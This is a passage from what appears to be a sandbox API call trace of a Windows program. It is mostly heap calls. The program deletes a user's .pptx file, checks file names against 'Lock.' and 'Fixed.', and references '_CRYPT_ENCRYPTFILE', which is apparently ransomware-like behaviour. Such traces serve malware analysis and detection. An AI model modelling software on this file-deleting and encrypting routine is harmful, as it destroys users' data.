dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0261.436] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0261.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0261.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0261.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0261.436] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0261.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0261.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0261.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0261.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0261.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0261.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0261.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0261.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0261.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0261.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0261.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0261.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0261.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0261.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0261.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0261.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0261.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0261.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0261.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4c) returned 0x2e558d8 [0261.436] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/BGmPJ_.pptx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\BGmPJ_.pptx", lpFilePart=0x8cedf4*="BGmPJ_.pptx") returned 0x25 [0261.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0261.436] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\BGmPJ_.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\bgmpj_.pptx")) returned 0x20 [0261.437] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\BGmPJ_.pptx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2e4e750, ftCreationTime.dwHighDateTime=0x1d58142, ftLastAccessTime.dwLowDateTime=0x1ad4e820, ftLastAccessTime.dwHighDateTime=0x1d5743f, ftLastWriteTime.dwLowDateTime=0x1ad4e820, ftLastWriteTime.dwHighDateTime=0x1d5743f, nFileSizeHigh=0x0, nFileSizeLow=0x15bd9, dwReserved0=0x1, dwReserved1=0x1c, cFileName="BGmPJ_.pptx", cAlternateFileName="BGMPJ_~1.PPT")) returned 0xa87550 [0261.437] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\BGmPJ_.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\bgmpj_.pptx")) returned 1 [0261.510] FindNextFileW (in: hFindFile=0xa87550, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2e4e750, ftCreationTime.dwHighDateTime=0x1d58142, ftLastAccessTime.dwLowDateTime=0x1ad4e820, ftLastAccessTime.dwHighDateTime=0x1d5743f, ftLastWriteTime.dwLowDateTime=0x1ad4e820, ftLastWriteTime.dwHighDateTime=0x1d5743f, nFileSizeHigh=0x0, nFileSizeLow=0x15bd9, dwReserved0=0x1, dwReserved1=0x1c, cFileName="BGmPJ_.pptx", cAlternateFileName="BGMPJ_~1.PPT")) returned 0 [0261.510] FindClose (in: hFindFile=0xa87550 | out: hFindFile=0xa87550) returned 1 [0261.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0261.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0261.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0261.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0261.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0261.510] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0261.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0261.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0261.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0261.511] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0261.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0261.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0261.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0261.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0261.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0261.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0261.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0261.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0261.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0261.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0261.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0261.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0261.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0261.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0261.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0261.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0261.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0261.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0261.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0261.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0261.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0261.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4c) returned 0x2e558d8 [0261.511] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/BGmPJ_.pptx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\BGmPJ_.pptx", lpFilePart=0x8cf650*="BGmPJ_.pptx") returned 0x25 [0261.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0261.511] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\BGmPJ_.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\bgmpj_.pptx")) returned 0xffffffff [0261.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0261.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0261.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0261.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0261.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0261.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0261.512] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0261.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0261.512] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0261.512] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0261.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0261.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0261.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0261.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0261.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0261.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0261.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0261.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0261.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0261.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0261.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0261.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0261.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0261.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Database1.accdb", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="atabase1.accdb", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tabase1.accdb", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0261.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="abase1.accdb", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="base1.accdb", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ase1.accdb", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="se1.accdb", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0261.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e1.accdb", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.accdb", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".accdb", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="accdb", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0261.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0261.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0261.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0261.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0261.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0261.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0261.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0261.513] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0261.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0261.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0261.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0261.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0261.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0261.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0261.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0261.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0261.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0261.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0261.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0261.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0261.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0261.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0261.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0261.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0261.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0261.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0261.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0261.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0261.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Database1.accdb", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="atabase1.accdb", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tabase1.accdb", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0261.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="abase1.accdb", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="base1.accdb", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ase1.accdb", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="se1.accdb", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0261.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e1.accdb", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.accdb", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".accdb", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0261.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0261.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0261.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0261.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0261.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0261.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0261.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0261.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0261.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0261.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0261.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0261.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0261.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0261.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0261.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0261.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0261.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0261.515] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0261.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0261.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0261.515] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0261.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0261.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0261.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0261.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0261.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0261.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0261.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0261.515] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0261.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0261.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0261.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0261.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0261.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0261.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0261.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0261.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0261.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0261.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0261.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0261.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0261.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0261.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0261.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0261.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0261.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0261.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0261.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0261.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0261.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0261.532] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0261.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0261.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0261.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0261.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0261.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0261.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0261.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0261.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0261.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0261.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0261.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0261.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0261.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0261.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0261.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0261.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0261.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0261.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0261.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0261.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0261.533] HeapFree 